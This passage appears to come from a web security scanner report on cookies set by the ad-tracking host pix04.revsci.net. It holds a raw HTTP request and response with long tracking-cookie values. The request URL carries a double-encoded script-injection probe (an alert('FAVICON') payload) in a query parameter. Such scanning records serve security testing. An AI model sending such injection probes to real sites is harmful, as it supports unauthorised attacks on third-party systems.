AFaVctanOU35/ErLXSzIByXHZyg7na2o07eicOqHCaq00wrvQxUSYV+oxNq6NDuMfLka4Se9gTjw9ZZMj63R5Bly2VCZnnvU33jTGcPtz2wBRLDyRjzDlALCzcxI/NCA1Kkm6joZHwlZU4Jr6SLMVKxlDrl5eSGkA6qwGUo7I1ZDjlid/k47g0ld7KJWZIRG6oUAjl0wT9ANgf4d7UDmSUnVXT8TaPnnKl+7DF6ID6pghiFIYKBnIcIltk+3WO5r316iq34xREuAyhLzvwn4AoNXbEuSDQirEtkRsqC9yghnhNCABZMLBvxyPptwHbvT4weL5k6PwCsDrdRFMLapAvP00t8HZynDglCUyW5YJhpNhMsj8rRMcrTHiio95XzpYQVICbRfxvuAGI4w+qoaJxndiQ0mwnayN8s7AVc3X9pDkKlKPXDarNuJ/EARWPRfcxJy18d++UkPeTX60moLBcxP4mHPFrlwOSQ4+Qyc1B7NXrg2xwBlmlZnc/vy3Fi31gon/6p7zhOIxDCGiKwEFknz7vadgGqld1cLwqzH6OhAfY8jsa8p/26SOjOygKEBIgsrm+13EcEK+6PNyPsimfyFeYkUHabdz8dGftnMPLgf7+B8Zx14LqwoUkwEzF4omy4BUQUOm2iPErATdY015XBw/3ngiiZYGnwMjyKAYQ6Go969u6BjTqw1Dlng/CNJPq7KdHKtbhWeDZIswWfS+UXRS226Ov8g5X+6P2i7NhxTKJbnBNDPHleNXzq+KRB/tUMjhb+TyiAfkxVF2E2L3v5xUy221azIhh7ArlMe3ZXI7sXJlF0YqHE/fsVdNop89QLOCGlS2np1IqezLb7srY/u9dJepf/59b38dqo3zGkfUdtHC8MK0MM4gGjo2su0M8iS+RWiOUs4V30Py9KJ+qjnOkhJMjIZvZ5R/sfHr78ja97y6gpUz6sLuYOUsD1JY6XZxF9mXiOn8pGzt3QGrPV5unR/EPPonFSA6Oj6Ei8ImLz7WprXeIljuzyKYZ5azxgfeA==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:32:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D10898/b3/0/3/1008211/98295750.js?D=DM_LOC%3Dhttp%253A%252F%252Fidolator.com%252Fwp-content2f889%252522%25253E%25253Cscript%25253Ealert(%252522FAVICON%252522)%25253C%252Fscript%25253Ed06b96a1bc7%252Fthemes%252Fidolator_1.5%252Fimages%252Ffavicon.ico%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F6%26DM_EOM%3D1&C=D10898 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://idolator.com/ifb/audience-science.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; rsiPus_TcLI="MLsXtaMOZwhnJpGoWeqiOkhRBfJq5qBSuRPKlWnBpfgZQSo6yJttbu+GJyr/FnqFiBtOj0MMf0A1OS6DgqF3FRtvufvgyQjAvbavIAzG/mrl5fos0jzFySM3Fy31Ao7Ebh3uztX78jATDhVNx1WRMLmFpna/hMyk0AkQ+RGNw8/ja9DZvVCIoWOZ3zoWVkQWa3moHLdcLNNI+7fIXit9fQONqT14U1w0FPBb9cgsoqgd68j6eMttu34aVZu/d+fUj7isKrKe4cndCaLYExmogONnWhKh+J9f7TLfa6PH0tptHMuZOF1cSr7P5cqBLbvFUcWsfjeMCG/f8spHnxQXAL8nRRC1wzaJ8qPaqDjVHhxu4nIepmoRGgrkOH8O0vQt4286anvsGhDbVv0Nsb7OVX9U0Zc4Vf4dZQ5G2e5hrZb1bJHQdQqjasWp1Nt8jnucTB8b4Q/Jnb3Fh7j+L7FGpNU/zU1yNFDSuSB54znzG47c6DP+6kDji+6RZbnzpWRyVAOCeS9Yc/ZzuNxpSay+Bdpn0kqwIBqeBXERDx1Z7KLNfWn7HtNHpyWaP3I4DNsn8PrZK8b2Gjc0e14CZ245dGCAuQdwJbc6j2SUur9nDYW7cL6tvB5y1MH0cPCty0J2lEFcYTKXCPFsSIp3YAkS32MvvsdoLn1d/krkLg4zda0cMm9Kua59JbmSoXHIJItgIVnEP3SkX7dxYOd/DG7OAoG0I5wUUn+AJ4LRa5kU32nRHVwQaDILCW1VzY0B3lSS6Z9mSpIBHUhRv5gciu6tTOzoiB2kH3XA72pKyLVROk9D4KLucgAAB+ueIRn8wR69h5gPZ+lHiKjpmubSMQ3yV8dSjX1dVUDfUUrBDh8OjRz7WzfanDaDqoUrFKI6EHw1XnTDWLM2cnSFkfFaQgOC8YrZowqyhJMuuVpIx/ixqnDsx9kGIztW8Hi1FuloHNVNBQHIU4G6iJqwoVu6bNOwfNRqNvD/w4oqWtvXqCvuIikhh9wMSzTE0UZqd6ZfWwpbTH1MOPdJdcxX31rZx4qSHBpMhxoyszkjZj9YPfgAMrb86c7kpVdrUj4LxTZs6Z5o82umuiNWChLZ/DvN29RfpYYmRQ073p9Hc48NlMflrzKueAGPB93K3+o1eEBylETNrLYuNFB68oIWntcNDAZLIg2HcsY3N4iXyk2yPWxW6r+YoZUTnq+vo9ElytuK/Jp8W7p4jtG47jpY8kQXsYtu9C3HHcoqi2SdLX2w/VUwBs/3SU3CI25hLq/LU0izRT66MSrwujtCk2q6sM4M"; rsi_us_1000000="pUMlIymnMBYY1A2AKVt/X42sJFnhBIsVXupLmVgPalQSXetQt1elVlvt4Kw5pRsR+P7ZtkH37C+PV21OTgK2tSplzTgX1CmAikLsMGDiVOeyz9gzHAnSm372yh4tVHRxb8PeHhUHejBiiZxOkhaZ045oThXnSR8DAX6fYV/ybIiqulf+Pu3RMyR5oF+yDfrCk40UNg0Mp16XYh7mRSVM/HoY4oDuWAom4gnqrhPe3r+iQUB0j3q0tkwKlBzk/9MGM3R2hf6QFQcFA/Y0lx/KIqYkEDuXlq7lweOLDGfB2KHCGVGkzKMsPN9GFXv/RUyGxIOOHISzxTE3RILsCvsP9soypT8NSUHCAcVVr5WpVuc2vUOi5MgBmGqRNBKolDzTy9/FBYJrmOzpeSO58TchDb61tROKccLOkHuqT1Q1cveswkoS3BkggmAJjNfOnag0xP3yotFAiIv7586EVSdiV8c84zW0RkP0Ltu6foHuhK1+R29GukGI/oWg2BobCpX/IAzdzVQKwKcBRQ4Dgwjtb8LRAPdEqwOSyrmF3oGNQaA0L+897x8nXL3Plyo1+OjxoEKVJ2EzmHkURDIYKyDLfZRA28hnB+UGj8LF9DhdnAYoQ6V2zOBqn6vO+BaB9czT3Pyzhw2zAuBWx+Jz5M1ht4XwlNIFhQpBD9DiYjy8+M6kL8fYMJ5ChzfLzauc4bc2f10QzIGJ/TOEQiJNgm/UYCPJimT8yavPrnQz1SwuiFKZxBHp4f29XKyXF0iX7bCrt6AOTgiss8wuNC3a/3aM/IgHRcWu3038LNW/sm7n7Gd0W4h5H72gd766m8rkC/YH8RRqsnZyX5R5wcPZLFUAJqEAOeZZjinbq/rgpxkp/x2CQ+hkPVNW2EjnMU77XaSR8pvN/HxrRF+AnH5BJ8USrrubV2etFGYmz1q0uLrxDphjCAN+lUd4NH5My9BwokFQvEeslMNVT42zlFkwpCZNLBWaUW9ajxJHkf7O1TOfSkcjuaQbwzei/zcbbxVZEzsH5nUPYbmnVGb97Da4oyNNuelVVMt7+XASLKnLONiHv3IGdI0yDuFGyHvA+QZ3g3pUbwU3ChTe2w4iMgYE0rwZZf5LpNds2gECG3zZAfbjF3KG1FCIoCjdAzYh5g5ZbWQ2jN011jYnH4ecXHdn3ceT0SJQNyxMoAA71+f1pYIn+9aH4Bk3tHrq9laUX4l9wgNgjSti9ZxOhSzb7g2fHqqygqPvS+aX0Pm0oEGQldpEekjZsQfiKBNyX/DneA7f/CypSSCNtaDDsonnfNSpBklcNi4bY/t0n2Z5WK0HCdRBJuqZJ8Nrg1tm82nxWLHf/M8k/d0VjYDc/FvxEWvtX3ZM+/++gC+QdS4Uz7JQ0KQ/Jpdh1/+8IfDEnme0rmuBVl25YTq1S32n1Z5cXUfq+9KOylWqlBE0S6zQkXZQBgIxgYl3ZoFdvE6/jtVyuh5jdSAjrzg4JebjZ774LSV6xP+redbMdzWAjZALUH23JsqOMGz8Hq/WqWP/X2IvHbrcv2IvRQyCPVRlh20+ZlqrihQ3tB/Zbzm9mE7B8DV3UXi/T4wHXgbFaAJzX5UKgpBX2CW7TkqyPtmhtZQOnfGFBneT+Vy/8uhXjkWSTt1QSpmXhydn5vcDkVl88gffwl8Ztr8ZGAiHJGpCuraCuZwkZGZ07gO81Q+Sht1LHglUiz5IlGk="; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rtc_LA6t=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; rsi_segs_1000000=pUPF5E+hOnMMpjaBv3Dh/hL8rsB4rOfq5QuYHHnLC/pV+zq2jLxL941oDZUZb5s27Nd/F3uURFTKKm1RcOFdIRxOljPRZ4227I3zoFaY6yjL81JnsbgAJu+8n7bu/Z7Fko4ebXuxzGf2q88DteXr5SMrCaCOsP2v1b0OTFJ1SaxGkI/w5/6vfwBuZjCGRMHu/ON/r2QDdVTUwZH2JAPSdDfkUlv5EDlcQIjYrYjIpbdhTDpMwjzcZW2VixDlxfbeb9iuz/CYQQo/9EeF6I6QTCPvccqqIu+csl9K7EiqSlA1zv7fzhuzbpNwf1E6h9tTJ6BZG8d/W3OxzkICm9c9iAeHxCRPOw7uPiGoYwPfA1xgFsX4r8vUAkYbZrF2NqaTULfthKdI9dW/kCvmK8UMwCp/zYCA0Culx+D81u4HeliaxSaBZGdxkcDn/iYVQbvpZs180/umrAtIpbept0kv8TbPQrV7yL95Pb3Yxpudl42nHyg4NZ8t9ZThQOJNlz7H/Sz3WzYKlzHWD+33Pj2srgq9aH/tbww4ZP8H54dBJ3NXn8TVZRv1Vt+KC+fgiNd5PIQMTvrt8K7gEn5UjiHYDRCfMjeIbQ7T+NTMprrEtinU5EJho9//B7k6vzXm4yqdCDwPH2HN+r48TizLbwrSB+lPMAESyw==; rtc__ROU=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_m5HQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5E+hOXMMpTaBv3Dh/hJU4xrMriQJSwsJSS2518p566AWsC6dZCCogy1fwjXjHJvVxCC5NyPuYuXxdU6jW0XnxxW5LaVCOktcrquTNuOWFTTkxfICGdlkVyCpK3b3iBtHZFHlC6tauUzkVsstlxUvHpxx6DjOYyhPvC5/ZjjhbqaES50QAhloD6YIsf2+FYRr0VuIwWQX4QMglVXTOe7YLEod92HudBfky4RL3Q239PgRK6oXAiPPaibO1jYM/Iz/kC/iihiL3rPthtLDeCHUZ3iH5dsjDx84V+C3xcXh455oXXiDJA+jeQPqSApTIk02czO7dpxnXVMEuNggt9rQ1n3YBmOEQT490yfGwKdC9wyySD2eInXvJI7TFlvjBdODqCSiBFUtVjWl6gKxWitgyWLkwKTtke7c9d/g8TWa+nRPnxb0dmeXqeTU+ES8BH0HuIbtXyrnUGRSOLCAE7iaUtfQ1qFqEzIUH3Mjn31mDjCdfCnjXPu45PRgweof1YCdlR8//I5+E0Y2aLwiTWDjpgMxu6Ut0+ebazQyKe2uAw/Vdofl0Icc4xApuNWcOA4lKLOVUj8vXZuLUEScdaDnMcicuqs1AU2EOJJtABY3UpLcODetKmmsZItjqo9Bx8HwAuF8B9F44lV3EsczCHrcngFfXCn66ogbuDw9D8wI; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:32:51 GMT; Path=/
Set-Cookie: rtc_LzCA=MLvH+QcJZzpn51KdVPOgNEq4ycXXNAyCN+LRv9fsONVfRqt6Qn35QexQL31IlbitPCMvDwBMAQWU4RBAwCEMoMFFT0t18ir5y2YIZKsVf4A1MyV5pIzguYiK8y+o8zbIRZrZ9xyanQeHqcRo9uARt2M2hUoJyA1o3PPpYvAgJnquuQOveNt+kyObkCyOeLVAQBx3JPcv81M4vRIMnRw0wo58TG2ePQWa50SMXHxvrRIInkvJS+F5enSqgTnBr71q81exva1eOKPUWKTIz4VpYRcalFe1tKQ25zvzgpgRN4p9y95tlJNo1dKcS8E9JQa/aIYcsgrgCeb9HaHv61V3YFjJdwoln4Pcqz6Zdpf3dF3pQAJRSPTBwdbK1yjIYZ1HnH8PlbazgcDaHXlBte9YvNOMF9LUsvTCO9OtmnXFvaIJ8gm7AxzpQ6H6c5peDD4hh50s/S6dyey0uJnVJNGB9mudh6gl4xhA1gAn9TG2VaHUlSg/MZN4N4eOF6oZrw8tLZu6cPeYYeCrpQj/T6CBFEEP7hELSVaqziK1Ig5F0M76EO9h7CFMB9DJO9u28jcej/u6pVe9w4w0OGPEHexnmazLoPwbBbQg3WfdPF2DkI+4om/DZL0Os8CJSMakm6OuP3nItB64r8sfMpstkr7tWQevuO79HqbZThGOYcZpCcZ2dnxoU2qse4nhXnastPwh+AHpTlQ2TViAXBB3Vb/oMHPx2YzUJ0e/8qcTnlDGFTkcJF+FiqbzfFBGT1XQoJ5tbCsJSNN/0bJJYeZsryNG+cphBle1M3pnHwWbE0Ac5F+wi3qpofX/i8o+JPCkR73+7fZXp4cD8o9TVaMVs+1H5+5WrHcapiPyXjo/2u88tqI8W1eGozRtFBR/GkDIJaU1sDbyaA5WJqdXZ8a/3qKUtRNyzp9rxoqF+XkRAX45pBDT73AqfhAExsM14sPXvi5NVHH28JIua4pKod9lltgJXBYFgD19HPxU0ZE1DzqTVnnZ+cmLIg3Y8xUvgthgARtmiJCss+deTAWmQg99bc5VAEgS7WlFYgBc65REKq1h42sTf632vhHfEbkuX7FO/kEPTjREzcmgEEmj6PfU+DqIGMWgmiUW7IJb2dvvA0jbfQH9cPxn4MATH+0y0Zb1m0wasEnPVxmvh/HRAFaVctanOU35/ErLXSzIByXHZyg7na2o07eicOqHCaq00wrvQxUSYV+oxNq6NDuMfLka4Se9gTjw9ZZMj63R5Bly2VCZnnvU33jTGcPtz2wBRLDyRjzDlALCzcxI/NCA1Kkm6joZHwlZU4Jr6SLMVKxlDrl5eSGkA6qwGUo7I1ZDjlid/k47g0ld7KJWZIRG6oUAjl0wT9ANgf4d7UDmSUnVXT8TaPnnKl+7DF6ID6pghiFIYKBnIcIltk+3WO5r316iq34xREuAyhLzvwn4AoNXbEuSDQirEtkRsqC9yghnhNCABZMLBvxyPptwHbvT4weL5k6PwCsDrdRFMLapAvP00t8HZynDglCUyW5YJhpNhMsj8rRMcrTHiio95XzpYQVICbRfxvuAGI4w+qoaJxndiQ0mwnayN8s7AVc3X9pDkKlKPXDarNuJ/EARWPRfcxJy18d++UkPeTX60moLBcxP4mHPFrlwOSQ4+Qyc1B7NXrg